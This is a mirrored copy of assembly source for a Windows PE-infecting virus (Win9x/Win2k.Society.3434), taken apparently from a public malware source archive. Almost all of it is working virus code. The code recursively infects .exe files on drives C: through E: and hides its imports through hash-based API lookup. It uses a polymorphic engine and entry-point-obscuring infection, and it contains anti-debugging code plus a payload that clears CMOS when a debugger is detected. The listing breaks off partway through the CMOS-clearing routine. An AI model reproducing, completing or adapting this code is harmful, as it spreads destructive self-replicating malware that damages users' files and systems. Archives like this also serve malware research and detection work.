mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-07 02:45:27 +00:00
2558 lines
88 KiB
NASM
2558 lines
88 KiB
NASM
|
||
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[SOCIETY.TXT]ÄÄÄ
|
||
;==============================================================================
|
||
; Win9x/Win2k.Society.3434 (c) necr0mancer
|
||
; december 2001
|
||
;ring-3 PE infector
|
||
;
|
||
;Features:
|
||
;
|
||
; * Works only in win2k & win9x,but can work on winNT(I haven't it!) if
|
||
; you add it kernel base on table (see source).
|
||
; * Polymorphic (use NPE32 engine).
|
||
; * Some infection methods (EPO,standart, .reloc OR .debug overwrite).
|
||
; * Simple antidebug.
|
||
; * Payload (on trace with td32:)) CMOS kill.)
|
||
; * Not infecting winzip self-extactors & upx-packed files
|
||
;
|
||
;Tnx: to all who write stuff.
|
||
; Infection sheme:
|
||
;
|
||
;==============================================================================
|
||
; ÚÄÄÄÄÄÄÄÄÄÄÄ¿
|
||
; ³ main ³ ÍÍÍÍÍ - incorect secton size
|
||
; ÀÄÄÄÄÄÂÄÄÄÄÄÙ
|
||
; ÚÄÄÄÄÄÁÄÄÄÄÄ¿
|
||
; ³ find reloc³
|
||
; ÀÄÄÄÄÄÂÄÄÄÄÄÙ
|
||
; ÚÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄ¿
|
||
; ÚÄÄÁÄÄÄ¿ ÚÄÄÄÁÄÄ¿
|
||
; ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´findedÆÍÍÍÍÍÍ» ³failed³
|
||
; ³ ÀÄÄÂÄÄÄÙ º ÀÄÄÄÂÄÄÙ
|
||
; ³ ÚÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄ¿ º ÚÄÄÄÄÁÄÄÄÄÄÄÄÄ¿
|
||
; ³ ³ EPO infection ³ ÚÄ×ÄÄÄ´ find .debug ³
|
||
; ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ³ º ÀÄÄÄÄÂÄÄÄÄÄÄÄÄÙ
|
||
; ³ ³ º ³
|
||
; ³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ º ÚÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
|
||
; ÀÄ´Overwrite infection ÃÄÄÄÄÙ ÈÍÍ͵"standart" infection ³
|
||
; ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
|
||
;
|
||
;
|
||
;==============================================================================
|
||
|
||
|
||
|
||
include 1.inc
|
||
include win.inc
|
||
|
||
PAGE_READWRITE equ 4
|
||
FILE_MAP_WRITE equ 2
|
||
DEBUG equ 0 ;no debug-release;)
|
||
|
||
extrn MessageBoxA:near
|
||
extrn ExitProcess:near
|
||
|
||
|
||
VIRTUAL_SIZE equ (offset _endvbody-offset _start)
|
||
PHYSICAL_SIZE equ (offset _fbodyend-offset _start)
|
||
DEBUG equ 0
|
||
|
||
.586p
|
||
.model flat
|
||
|
||
.data
|
||
|
||
message_title db '[Dekadance] has been start.',0
|
||
|
||
_message db 'Credo:',0dh
|
||
db 'Dekadance is lifestyle.',0dh,0dh
|
||
db 'Copyleft (c) 2001 necr0mancer',0
|
||
.code
|
||
|
||
_emulation:
|
||
|
||
push eax ;jmp viri
|
||
xor eax,eax
|
||
jmp _callz_manager
|
||
|
||
Original:
|
||
|
||
push MB_ICONEXCLAMATION
|
||
push offset message_title
|
||
push offset _message
|
||
push 0
|
||
call MessageBoxA
|
||
|
||
push 0
|
||
call ExitProcess ; call ExitProcess
|
||
|
||
;------------------------------------------------------------------------------
|
||
;Run loader
|
||
_callz_manager:
|
||
|
||
pushfd ;save flags®s
|
||
pusha
|
||
|
||
@cm equ <-offset @@GetDelta>
|
||
|
||
call @@GetDelta ;get delta
|
||
@@GetDelta:
|
||
pop ebp
|
||
|
||
if DEBUG eq 1
|
||
int 3
|
||
endif
|
||
|
||
|
||
and eax,0ffh ;AL=# in function table
|
||
push eax
|
||
push ebp
|
||
|
||
xor edi,edi
|
||
|
||
nop_call:
|
||
call _start
|
||
pop ebp
|
||
|
||
push edi
|
||
lea edi,[ebp+nop_call @cm]
|
||
mov eax,90909090h ;write nop for next call
|
||
stosd
|
||
stosb
|
||
pop edi
|
||
|
||
pop eax ;eax=# in function table
|
||
shl eax,3 ;eax*8
|
||
|
||
or edi,edi ;first mng_call?
|
||
jnz table_offset_exist
|
||
|
||
db (0b8h OR __edi) ;mov edi,xxxxxxxx
|
||
delta_tbl dd 0
|
||
|
||
jmp short get_me_out
|
||
|
||
table_offset_exist:
|
||
|
||
mov [ebp+delta_tbl @cm],edi ;save table_pointer
|
||
;for next calls
|
||
get_me_out:
|
||
lea edi,[edi+eax]
|
||
|
||
mov eax,[esp+8*4+4] ;restore old eax
|
||
mov [esp._eax],eax
|
||
mov [esp+8*4+4],edi ;write ret adr
|
||
|
||
popa
|
||
popfd
|
||
ret
|
||
|
||
;==============================================================================
|
||
;Virii part
|
||
|
||
@ex equ <-offset Delta>
|
||
|
||
_start:
|
||
call Delta ;get Delta
|
||
Delta:
|
||
|
||
if DEBUG eq 1
|
||
int 3
|
||
endif
|
||
pop ebp
|
||
jmp short AfterData ;go to main part
|
||
|
||
; === some data ===
|
||
|
||
imagebase dd 00400000h
|
||
OldRVA dd (offset Original-00400000h)
|
||
fmask db '*.exe',0
|
||
|
||
tbl:
|
||
|
||
dd 77e80000h
|
||
dd 0Bff70000h
|
||
dd 0
|
||
|
||
jmp_table:
|
||
mov eax,offset Original
|
||
jmp eax
|
||
dq 9 dup (0)
|
||
|
||
Mask_table:
|
||
|
||
db 2
|
||
dw 025FFh ;jmp xxxxxxx
|
||
db 0
|
||
db 0
|
||
db 0
|
||
|
||
;=============================================================================
|
||
Fsize dd ?
|
||
Voff dd ?
|
||
Foff dd ?
|
||
MZbase dd ?
|
||
|
||
AfterData:
|
||
|
||
db 0b8h ;mov eax,xxxxxxxx
|
||
reTT_need dd 1 ;flag of type infection
|
||
|
||
or eax,eax
|
||
jnz no_need_heh
|
||
|
||
mov eax,[ebp+OldRVA @ex] ;restore old entrypoint
|
||
add eax,[ebp+imagebase @ex]
|
||
push eax ;FOR returning in prog
|
||
|
||
no_need_heh:
|
||
|
||
lea esi,[ebp+jmp_table @ex] ;copy adr_table
|
||
lea edi,[ebp+jmp_tmp_table @ex]
|
||
mov ecx,10*2
|
||
rep movsd
|
||
|
||
lea eax,[ebp+offset @@@error_handle @ex];find kernel base
|
||
push eax
|
||
|
||
xor eax,eax
|
||
push 4 ptr fs:[eax] ;set SEH
|
||
mov fs:[eax],esp
|
||
|
||
lea esi,[ebp+offset tbl @ex] ;possible kernel bases
|
||
lea edi,[ebp+offset __kernel32 @ex]
|
||
|
||
pusha
|
||
jmp _lodsd
|
||
_ex:
|
||
pop 4 ptr fs:[eax] ;restore SEH
|
||
pop eax ;
|
||
jmp no_yet ;& exit
|
||
|
||
;=============================================================================
|
||
|
||
@@@error_handle:
|
||
|
||
mov esp,[esp+8]
|
||
sub esp,20h
|
||
|
||
_lodsd:
|
||
popa
|
||
lodsd
|
||
or eax,eax ;end of table ?
|
||
je _ex
|
||
mov [edi],eax
|
||
pusha
|
||
|
||
db 0b8h
|
||
__kernel32 dd 0
|
||
|
||
|
||
cmp word ptr[eax],'ZM' ;test on MZ
|
||
jne _lodsd
|
||
__ok:
|
||
xchg eax,ebx
|
||
xor eax,eax
|
||
add esp,20h
|
||
pop 4 ptr fs:[eax] ;restore SEH
|
||
pop eax
|
||
|
||
;==============================================================================
|
||
|
||
sys_ok:
|
||
|
||
lea esi,[ebp+offset _Table @ex] ;table of CRC32
|
||
lea edi,[ebp+offset _adr @ex] ;table of needed
|
||
;function's adresses
|
||
Ft_repeat:
|
||
|
||
call get_proc_adr ;find adress
|
||
|
||
or eax,eax ;no finded :(
|
||
jz end_Ft_cycle
|
||
stosd
|
||
|
||
jmp Ft_repeat
|
||
|
||
end_Ft_cycle:
|
||
|
||
|
||
out 70h,al ;
|
||
in al,71h ;
|
||
inc al ;
|
||
shl eax,8 ;
|
||
mov ecx,1000000 ; GET RANDOM NUMBER
|
||
loop $ ;
|
||
out 70h,al ;
|
||
in al,71h ;
|
||
not eax
|
||
; save it
|
||
mov [ebp+__seed @ex],eax ; for virii
|
||
inc eax ;
|
||
mov [ebp+runSeed @ex],eax ; and for NPE
|
||
|
||
|
||
xor eax,eax ;files infected=0
|
||
mov 4 ptr[ebp+FileNum @ex],eax
|
||
|
||
mov [ebp+our_ebp @ex],ebp ;save current delta
|
||
;for creating thread
|
||
|
||
xor ebx,ebx ;ebx=0
|
||
|
||
lea eax,[ebp+offset Thr_indefirer @ex]
|
||
push eax
|
||
|
||
push ebx ;push 0
|
||
push ebx ;push 0
|
||
|
||
lea eax,[ebp+offset Thread_proc @ex] ;offset to thread proc
|
||
push eax
|
||
|
||
push ebx ;push 0
|
||
push ebx ;push 0
|
||
call [ebp+CreateThread @ex] ;Create thread
|
||
|
||
no_yet:
|
||
lea edi,[ebp+offset jmp_tmp_table @ex] ;get jmp_table pointer
|
||
;to calls_manager
|
||
retn ;exit to parent code
|
||
|
||
Thread_proc:
|
||
|
||
db (0b8h or __ebp) ;mov ebp,xxxxxxxx
|
||
our_ebp dd 0
|
||
|
||
lea edi,[ebp+SearchRec @ex]
|
||
lea edx,[ebp+dirname @ex]
|
||
mov [edx],'\:C'
|
||
call filefind ;infect drives
|
||
|
||
mov [edx],'\:D'
|
||
call filefind
|
||
|
||
mov [edx],'\:E'
|
||
call filefind
|
||
|
||
db 0b8h ;mov eax,xxxxxxxx
|
||
Thr_indefirer dd 0
|
||
|
||
push eax
|
||
call [ebp+ExitThread @ex] ;good bye!
|
||
|
||
;=========================================================================================
|
||
;Input: esi=offset of string
|
||
; ebx=kernel adr
|
||
;Out : eax=adr(if has finded;))
|
||
|
||
get_proc_adr proc
|
||
|
||
push edi
|
||
|
||
push eax
|
||
lodsd
|
||
mov [ebp+crc32 @ex],eax ;save getted crc
|
||
pop eax
|
||
|
||
mov ecx,[ebx+3ch] ;PE-header offset
|
||
add ecx,ebx
|
||
|
||
mov ecx,[ecx+78h] ;Export table offset
|
||
jecxz return_0 ;if (et=null) then err
|
||
|
||
add ecx,ebx ;ecx-offset of export
|
||
;table
|
||
xor edi,edi
|
||
_search:
|
||
|
||
mov edx,[ecx+20h] ;offsets on FuncNames
|
||
add edx,ebx ;correct on base
|
||
|
||
mov edx,[edx+edi*4]
|
||
add edx,ebx
|
||
|
||
push esi ;crc table
|
||
push ecx ;base
|
||
|
||
mov esi,edx
|
||
push edx
|
||
|
||
find_zero:
|
||
|
||
lodsb
|
||
or al,al
|
||
jnz find_zero
|
||
dec esi
|
||
|
||
sub esi,edx
|
||
xchg ecx,esi
|
||
|
||
pop esi
|
||
call CRC32
|
||
|
||
db (0b8h or __edx) ;mov edx,crc
|
||
crc32 dd 0
|
||
|
||
pop ecx ;base
|
||
pop esi ;table
|
||
|
||
cmp edx,eax
|
||
je _name_found
|
||
|
||
inc edi
|
||
cmp edi,[ecx+18h]
|
||
jb _search
|
||
|
||
return_0:
|
||
|
||
xor eax,eax ;error ocures
|
||
jmp _return
|
||
|
||
_name_found:
|
||
;esi=index on string table
|
||
mov edx,[ecx+24h]
|
||
add edx,ebx
|
||
movzx edx,word ptr [edx+edi*2]
|
||
|
||
mov eax,[ecx+1ch] ;AdrTable
|
||
add eax,ebx ;correct on base
|
||
|
||
mov eax,[eax+edx*4]
|
||
add eax,ebx ;get adress of nedded function
|
||
|
||
_return:
|
||
|
||
pop edi ;in output eax
|
||
retn
|
||
get_proc_adr endp
|
||
|
||
|
||
;=============================================================================
|
||
; INFECT
|
||
;=============================================================================
|
||
|
||
infect proc
|
||
pushad
|
||
|
||
mov esi,edx ;esi=edx=full name
|
||
|
||
_findzero:
|
||
lodsb
|
||
or al,al
|
||
jnz _findzero
|
||
;esi=offset of null byte+1
|
||
mov eax,[esi-4]
|
||
|
||
cmp eax,00455845h ;EXE?
|
||
je exe_infect
|
||
|
||
cmp eax,00657865h ;exe?
|
||
jne no_EXE
|
||
|
||
exe_infect:
|
||
|
||
cmp byte ptr [ebp+FileNum @ex],15
|
||
ja no_EXE ;More than 15 files?
|
||
|
||
_gogo:
|
||
call fopen ;edx=FileName
|
||
|
||
or eax,eax ;error ocures?
|
||
je i_close_exit
|
||
|
||
xchg ebx,eax ;ebx=handle
|
||
call f_createmap ;createfilemapping
|
||
|
||
mov [ebp+MZbase @ex],eax
|
||
xchg eax,edx ;edx=mem_adr
|
||
|
||
mov ax,word ptr[edx+18h]
|
||
cmp al,40h
|
||
jne i_close_exit
|
||
|
||
mov eax,[edx+3ch]
|
||
add edx,eax ;EDX=offset of PE header
|
||
mov eax,[edx]
|
||
cmp ax,'EP' ;really PE ?
|
||
jne i_close_exit
|
||
|
||
|
||
;get last section
|
||
|
||
movzx eax,word ptr[edx+14h] ;NT header size
|
||
add eax,18h ;Size of PE-header
|
||
add eax,edx ;Eax=offset of Object table
|
||
|
||
push eax
|
||
push edx
|
||
|
||
movzx eax,word ptr[edx+6h] ;Number of objects
|
||
|
||
dec eax
|
||
smov esi,40 ;size of table
|
||
mul esi ;result in EDX:EAX
|
||
|
||
xchg esi,eax ;ESI=offset of last object
|
||
|
||
pop edx
|
||
pop eax
|
||
|
||
mov edi,eax ;edi=Object-table
|
||
add esi,eax ;correct(esi=last object)
|
||
|
||
push edi
|
||
|
||
;=============================================================================
|
||
|
||
;find winzip or UPX0
|
||
|
||
mov al,1
|
||
movzx ecx,word ptr[edx+6h] ;Number of objects
|
||
find_upx:
|
||
|
||
cmp 4 ptr[edi],'niw_' ;_winzip_
|
||
je zip_upx
|
||
|
||
cmp 4 ptr[edi],'0XPU' ;UPX0
|
||
je zip_upx
|
||
|
||
add edi,40
|
||
loop find_upx
|
||
|
||
xor eax,eax
|
||
zip_upx:
|
||
;=============================================================================
|
||
pop edi
|
||
or eax,eax
|
||
jnz i_close_exit
|
||
|
||
mov eax,[edx+34h] ;get & save imagebase
|
||
mov [ebp+imagebase @ex],eax
|
||
|
||
mov ecx,[esi+10h] ;get Fsize
|
||
mov [ebp+Fsize @ex],ecx
|
||
|
||
mov eax,[esi+8h] ;get Vsize
|
||
or eax,eax ;Vsize=0?
|
||
jz i_close_exit
|
||
|
||
or ecx,ecx ;Fsize=0?
|
||
jz i_close_exit
|
||
|
||
cmp eax,ecx ;Vsize<Fsize
|
||
jb i_close_exit
|
||
|
||
mov eax,[esi+14h] ;get Foffset
|
||
mov [ebp+Foff @ex],eax
|
||
|
||
mov eax,[esi+0Ch] ;get Voffset
|
||
mov [ebp+Voff @ex],eax
|
||
|
||
mov ecx,'emit' ;check & write sign
|
||
cmp [edx+08h],ecx
|
||
je i_close_exit
|
||
mov [edx+08h],ecx
|
||
|
||
push esi ;esi=last (copy)
|
||
push eax ;SAve VO of virii
|
||
push edi ;obj-table offst
|
||
|
||
|
||
|
||
;find .reloc section
|
||
movzx ecx,word ptr[edx+6h] ;Number of objects
|
||
find_reloc:
|
||
|
||
cmp 4 ptr[edi],'ler.' ;.reloc
|
||
je question_EPO
|
||
|
||
add edi,40
|
||
loop find_reloc
|
||
|
||
;==============================================================================
|
||
;find .debug section
|
||
|
||
pop edi ;begin of sections tabl.
|
||
movzx ecx,word ptr[edx+6h] ;Number of objects
|
||
find_debug:
|
||
cmp 4 ptr[edi],'bed.' ;.debug
|
||
je @@reloc_debug_finded
|
||
|
||
add edi,40
|
||
loop find_debug
|
||
|
||
;==============================================================================
|
||
;neither .reloc nor .debug not finded
|
||
|
||
jmp @@Standart
|
||
|
||
@@reloc_finded_stack:
|
||
|
||
pop eax ;clear stack
|
||
|
||
@@reloc_debug_finded: ;.reloc or .debug are finded
|
||
|
||
mov eax,[ebp+MZbase @ex] ;begin of Exe
|
||
add eax,[edi+14h] ;esi=Physical_Offset of .debug section
|
||
mov 4 ptr[ebp+reloc_offset @ex],eax
|
||
@@Overwrite:
|
||
add esp,4*2
|
||
|
||
xor ecx,ecx
|
||
mov [ebp+reTT_need @ex],ecx ;set flag @@overwrite=0
|
||
|
||
xchg edi,esi ;esi=.reloc secton
|
||
|
||
lea eax,[edx+28h] ;set new RVA
|
||
mov ecx,[eax]
|
||
or ecx,ecx
|
||
jz i_close_exit ;RVA=0
|
||
|
||
mov [ebp+OldRVA @ex],ecx
|
||
|
||
mov ecx,[esi+0ch] ;section RVA
|
||
mov [eax],ecx
|
||
|
||
mov eax,10000 ;get 10 kb
|
||
call GetMem
|
||
|
||
push eax
|
||
xchg edi,eax
|
||
|
||
call call_NPE32 ;edi=bufer dectination
|
||
|
||
mov [esi+24h],0E0000020h ;set attributes
|
||
add [esi+10h],ecx ;Add virus size
|
||
|
||
xchg edi,esi ;esi=data
|
||
db (0B8h or __edi) ;mov edi,xxxxxxxx
|
||
reloc_offset dd 0
|
||
rep movsb ;write virii
|
||
|
||
jmp common_exit
|
||
|
||
@@Standart:
|
||
pop esi ;<<<clear stack
|
||
pop esi
|
||
|
||
xor ecx,ecx
|
||
mov [ebp+reTT_need @ex],ecx ;set flag @@overwrite=0
|
||
|
||
lea edi,[edx+28h] ;set new RVA
|
||
mov ecx,[edi]
|
||
or ecx,ecx ;RVA==0 ?
|
||
jz i_close_exit
|
||
|
||
mov [ebp+OldRVA @ex],ecx
|
||
mov eax,[ebp+Voff @ex]
|
||
add eax,[ebp+Fsize @ex] ;eax=virtual offset+physic size=new RVA
|
||
mov [edi],eax
|
||
|
||
mov eax,10000 ;10 kb
|
||
call GetMem
|
||
push eax
|
||
xchg edi,eax
|
||
|
||
mov ecx,[edx+38h] ;Virtual aligment
|
||
mov eax,VIRTUAL_SIZE+400h*2 ;add 2 kb for decryptor
|
||
call Round ;align to phys_aligment
|
||
|
||
add [esi+08h],eax ;Add virus size to section
|
||
mov eax,[esi+08h]
|
||
|
||
mov ecx,[ebp+Voff @ex] ;Virtual offset+virtualsize
|
||
add ecx,eax
|
||
mov [edx+50h],ecx ;Correct imageSize
|
||
|
||
mov [esi+24h],0E0000020h ;set attributes
|
||
|
||
call call_NPE32
|
||
add [esi+10h],ecx ;Add virus size
|
||
|
||
push ecx
|
||
mov ecx,[ebp+Foff @ex]
|
||
add ecx,[ebp+Fsize @ex] ;Offset of end of last section
|
||
call fseek
|
||
pop ecx ;restore cpypted_size
|
||
|
||
call fwrite ;write virii
|
||
|
||
jmp common_exit
|
||
|
||
;==============================================================================
|
||
question_EPO:
|
||
|
||
cmp 4 ptr[edi+10h],PHYSICAL_SIZE+900h ;check section size
|
||
jnb size_s_ok
|
||
|
||
pop eax ;<<<clear stack
|
||
jmp @@Standart ;standart infect
|
||
size_s_ok: ;if reloc < virsize
|
||
|
||
smov eax,3 ;max 2
|
||
call randomGen ;get random number
|
||
|
||
or eax,eax ;0 = make overwrite
|
||
jnz _dbg ;1 = make EPO
|
||
;2 = debugers sucks:)
|
||
; & EPO
|
||
_clear_one_param:
|
||
|
||
; pop eax ;<<<clear stack
|
||
; jmp @@reloc_debug_finded
|
||
jmp @@reloc_finded_stack
|
||
|
||
_dbg:
|
||
dec eax ;eax==1?
|
||
jz @@reloc_EPO
|
||
|
||
call Debuger_fuckup
|
||
|
||
@@reloc_EPO:
|
||
|
||
pop eax ;first obj.
|
||
|
||
inc 4 ptr[ebp+reTT_need @ex] ;set flag @@overwrite
|
||
;into 1 or whatever value
|
||
|
||
mov esi,[ebp+MZbase @ex] ;begin of Exe
|
||
add esi,[eax+14h] ;esi==Physical_Offset of first section
|
||
|
||
pop eax ;clear stack<<<<
|
||
|
||
mov eax,[ebp+Voff @ex]
|
||
add eax,[ebp+Fsize @ex] ;eax=virtual offset
|
||
;+physic size=new RVA
|
||
|
||
mov ecx,[edi+0ch] ;get section RVA
|
||
|
||
pop eax ;clear stack<<<<
|
||
push edi ;.reloc offset
|
||
|
||
mov edi,[edi+14h] ;edi=offset of .reloc section
|
||
add edi,4 ptr[ebp+MZbase @ex] ;correct on begin of file
|
||
|
||
mov eax,400h ;write_some_garbage
|
||
call randomGen
|
||
inc eax
|
||
add ecx,eax ;correct RVA_reloc
|
||
|
||
add eax,edi
|
||
mov [ebp+EPO_edi @ex],eax
|
||
|
||
lea eax,[ebp+Mask_table @ex]
|
||
push eax
|
||
|
||
lea eax,[ebp+replace @ex]
|
||
push eax
|
||
|
||
smov eax,10 ;get random (max 10)
|
||
call randomGen
|
||
inc eax
|
||
|
||
push eax ;count of functions
|
||
push edi ;RELOC offset
|
||
push esi ;CODE offset
|
||
push ecx ;virtual offset
|
||
|
||
;-----------------------------------------------------------------------------
|
||
;Create_UEP(
|
||
; dword VO // virtual offset
|
||
; *dword code // offset to .code section(already has read)
|
||
; *dword reloc // offset to .reloc section(already has read)
|
||
; dword num_records // count of records in table to rewrite
|
||
; *dword adr_modify // address of "replasing" proc
|
||
; *dword mask_table // pointer to a mask table
|
||
; );
|
||
;-----------------------------------------------------------------------------
|
||
|
||
call Create_UEP
|
||
|
||
pop esi ;restore original esi
|
||
jc i_close_exit ;no_relocs_finded :(
|
||
|
||
mov eax,10000 ;get 10 kb
|
||
call GetMem
|
||
push eax
|
||
xchg edi,eax ;edi=mem
|
||
|
||
call call_NPE32 ;cpypt virii
|
||
|
||
add [esi+10h],ecx ;Add virus size
|
||
mov [esi+24h],0E0000020h ;set attributes
|
||
|
||
push ecx
|
||
push edi
|
||
|
||
db (0b8h or __edi) ;mov edi,EPO_edi
|
||
EPO_edi dd 0
|
||
|
||
lea esi,[ebp+c_manager @ex]
|
||
mov ecx,cm_size ;manager size
|
||
rep movsb ;copy "manager"
|
||
|
||
pop esi
|
||
pop ecx
|
||
rep movsb ;copy virii
|
||
|
||
common_exit:
|
||
|
||
call [ebp+GlobalFree @ex] ;free memory
|
||
inc byte ptr [ebp+FileNum @ex]
|
||
|
||
i_close_exit:
|
||
|
||
call f_closemap ;unmap file from memory
|
||
call fclose ;close file
|
||
no_EXE:
|
||
|
||
popad
|
||
retn
|
||
|
||
infect endp
|
||
|
||
;==============================================================================
|
||
;In: edx=dirname
|
||
; edi=SearchRec
|
||
filefind proc
|
||
pushad
|
||
|
||
sub esp,1024 ;for full directory name
|
||
|
||
mov esi,edx ;esi=offset of dirname
|
||
mov edi,esp ;edi=memory for FULL dirname
|
||
|
||
_scopy:
|
||
lodsb
|
||
stosb
|
||
or al,al ;end of ASCIIZ string?
|
||
jnz _scopy
|
||
|
||
dec edi
|
||
|
||
mov al,'\' ;add '\' if need
|
||
cmp [edi-1],al
|
||
je _estislesh
|
||
stosb
|
||
_estislesh:
|
||
|
||
mov esi,edi ;esi=position for file/dir
|
||
|
||
mov eax,'*.*'
|
||
stosd
|
||
mov eax,esp
|
||
|
||
mov edi,[esp+1024] ;restore edi
|
||
push edi
|
||
|
||
push eax
|
||
|
||
call [ebp+FindFirstFile @ex] ;eax=handle for search
|
||
|
||
inc eax
|
||
jz ff_quit ;cmp eax,-1
|
||
dec eax
|
||
|
||
xchg ebx,eax ;search handle
|
||
|
||
ff_infect:
|
||
|
||
push ecx ;pause
|
||
mov ecx,1000000
|
||
loop $
|
||
pop ecx
|
||
|
||
|
||
pushad
|
||
xchg esi,edi ;edi=position of file/dir,esi=ff_struc
|
||
lea esi,[esi].ff_fullname ;esi=finded name
|
||
_sadd:
|
||
|
||
lodsb ;string add
|
||
stosb
|
||
or al,al
|
||
jnz _sadd
|
||
popad
|
||
|
||
mov edx,esp ;FULL name of file/dir
|
||
|
||
test byte ptr [edi].ff_attr, 16
|
||
jnz ff_dir ;dir?
|
||
|
||
call infect ;no dir,infect
|
||
jmp ff_next
|
||
|
||
ff_dir:
|
||
|
||
cmp byte ptr [edi].ff_fullname,'.'
|
||
je ff_next
|
||
|
||
call filefind
|
||
|
||
ff_next:
|
||
|
||
push edi
|
||
push ebx
|
||
call [ebp+FindNextFile @ex]
|
||
|
||
or eax,eax
|
||
jnz ff_infect ;no dirs/files?
|
||
|
||
ff_quit:
|
||
|
||
push ebx
|
||
call [ebp+FindClose @ex]
|
||
|
||
add esp,1024
|
||
|
||
popad
|
||
retn
|
||
filefind endp
|
||
|
||
|
||
;==============================================================================
|
||
;In : edi=bufer
|
||
;Out : ecx=size generated
|
||
;modify :eax,edx,ecx
|
||
call_NPE32 proc
|
||
|
||
call Debuger_fuckup
|
||
|
||
push ebx
|
||
push edx
|
||
xor eax,eax
|
||
inc eax
|
||
cpuid ;get unical value
|
||
xor eax,edx ;for this CPU
|
||
pop edx
|
||
pop ebx
|
||
|
||
push eax ;move it in flags
|
||
|
||
mov eax,[ebp+offset runSeed @ex]
|
||
push eax ;seed (or NULL)
|
||
|
||
xor eax,eax
|
||
mov [ebp+offset runSeed @ex],eax ;seed has been
|
||
;inicialized == NULL
|
||
|
||
_push_size:
|
||
|
||
mov eax,PHYSICAL_SIZE
|
||
push eax ;size
|
||
|
||
push edi ;bufer
|
||
|
||
lea eax,[ebp+offset _start @ex] ;data
|
||
push eax
|
||
|
||
|
||
;==============================================================================
|
||
;int NPE_main(
|
||
; offset data
|
||
; offset bufer
|
||
; count_bytes
|
||
; seed (nul if not 1st generation)
|
||
; flags
|
||
; )
|
||
;==============================================================================
|
||
|
||
call npe_main ;out eax=size
|
||
xchg ecx,eax
|
||
jnc e_call_npe32 ;if no errors
|
||
|
||
;---------------- error ------------------
|
||
|
||
mov ecx,PHYSICAL_SIZE
|
||
pusha
|
||
lea esi,[ebp+offset _start @ex] ;data
|
||
;edi = bufer
|
||
rep movsb ;copy virii to bufer
|
||
popa
|
||
e_call_npe32:
|
||
retn
|
||
call_NPE32 endp
|
||
;==============================================================================
|
||
|
||
|
||
GetMem proc
|
||
|
||
pusha
|
||
push eax
|
||
push GMEM_FIXED
|
||
call [ebp+GlobalAlloc @ex] ;GetMemory
|
||
;eax=offset of getted memory
|
||
|
||
mov [esp._eax],eax
|
||
popa
|
||
|
||
retn
|
||
GetMem endp
|
||
|
||
;==============================================================================
|
||
;Input:ecx=field of rounding
|
||
; eax=size
|
||
Round proc
|
||
bsr ecx,eax ;Scan backward for bit
|
||
|
||
dec ecx
|
||
|
||
shr eax,cl
|
||
inc eax
|
||
shl eax,cl
|
||
|
||
retn
|
||
Round endp
|
||
|
||
;==============================================================================
|
||
CRC32 proc
|
||
pusha
|
||
|
||
db (0b8h or __ebx) ;mov ebx,polinom
|
||
polinom dd 04c11db7h
|
||
|
||
xor edx,edx
|
||
next_8_bites:
|
||
push ecx
|
||
|
||
xor eax,eax
|
||
lodsb
|
||
shl eax,32-8-1
|
||
smov ecx,8
|
||
carry_find:
|
||
|
||
shl eax,1
|
||
shld edx,eax,1
|
||
jnc not_carry
|
||
|
||
xor edx,ebx
|
||
not_carry:
|
||
|
||
loop carry_find
|
||
|
||
pop ecx
|
||
|
||
loop next_8_bites
|
||
|
||
|
||
;add null bites
|
||
|
||
smov ecx,32+8+1
|
||
@carry_find:
|
||
shl edx,1
|
||
jnc @not_carry
|
||
xor edx,ebx
|
||
|
||
@not_carry:
|
||
loop @carry_find
|
||
|
||
mov [esp._eax],edx ;return CRc in eax
|
||
|
||
popa
|
||
ret
|
||
CRC32 endp
|
||
|
||
;==============================================================================
|
||
replace:
|
||
|
||
;=== copy old jumper to table===
|
||
;ecx=#of finded
|
||
;edi=offst of command(cor)
|
||
;ebx=offset of commnd(phys)
|
||
;esi=setted virtual offset
|
||
pusha
|
||
|
||
push esi
|
||
|
||
push edi
|
||
xchg edi,esi
|
||
lea edi,[(ebp+offset jmp_table)+ecx*8 @ex] ;num in table
|
||
movsd
|
||
movsd
|
||
pop edi
|
||
|
||
mov ax,0b050h ;push eax+mov al
|
||
stosw
|
||
|
||
;ecx=count/index
|
||
xchg eax,ecx ;eax=num records param
|
||
mov ah,0e9h ;jmp.....
|
||
stosw
|
||
|
||
pop eax ;VO
|
||
sub eax,ebx
|
||
sub eax,5+3 ;Pa3Huya
|
||
stosd
|
||
|
||
popa
|
||
retn
|
||
;==============================================================================
|
||
|
||
|
||
|
||
|
||
|
||
|
||
;=============================================================================
|
||
randomGen proc
|
||
pusha
|
||
push eax ;save max_random
|
||
|
||
db 0b8h ;mov eax,xxxxxxxx
|
||
__seed dd 12345678h
|
||
|
||
mov edi,134775813 ;eax=new seed
|
||
mul edi ;EDX:EAX=EAX*EDI
|
||
inc eax
|
||
mov [ebp+__seed @ex],eax
|
||
|
||
xor edx,edx
|
||
|
||
pop ecx
|
||
or ecx,ecx ;max_random=0
|
||
jz __div_0
|
||
div ecx
|
||
|
||
mov [esp._eax],edx
|
||
|
||
__div_0:
|
||
popa
|
||
ret
|
||
randomGen endp
|
||
|
||
;=============================================================================
|
||
Debuger_fuckup proc
|
||
pusha
|
||
|
||
call [ebp+IsDebuggerPresent @ex] ;catch stupid TD32 ;)
|
||
or eax,eax
|
||
jnz fuckup
|
||
|
||
push edi
|
||
sidt [esp-2]
|
||
pop edi
|
||
|
||
mov [edi+1*8],eax ;kill int 1
|
||
mov [edi+3*8],eax ;kill int 3
|
||
|
||
mov dr0,eax ;kill debug system regs
|
||
mov dr1,eax ;NOTE:
|
||
mov dr2,eax ; SoftIce is interrupts
|
||
mov dr3,eax ; this commands &
|
||
; virii suck.
|
||
popa
|
||
retn
|
||
|
||
fuckup:
|
||
smov eax,5eh ;Clear CMOS
|
||
smov edx,70h
|
||
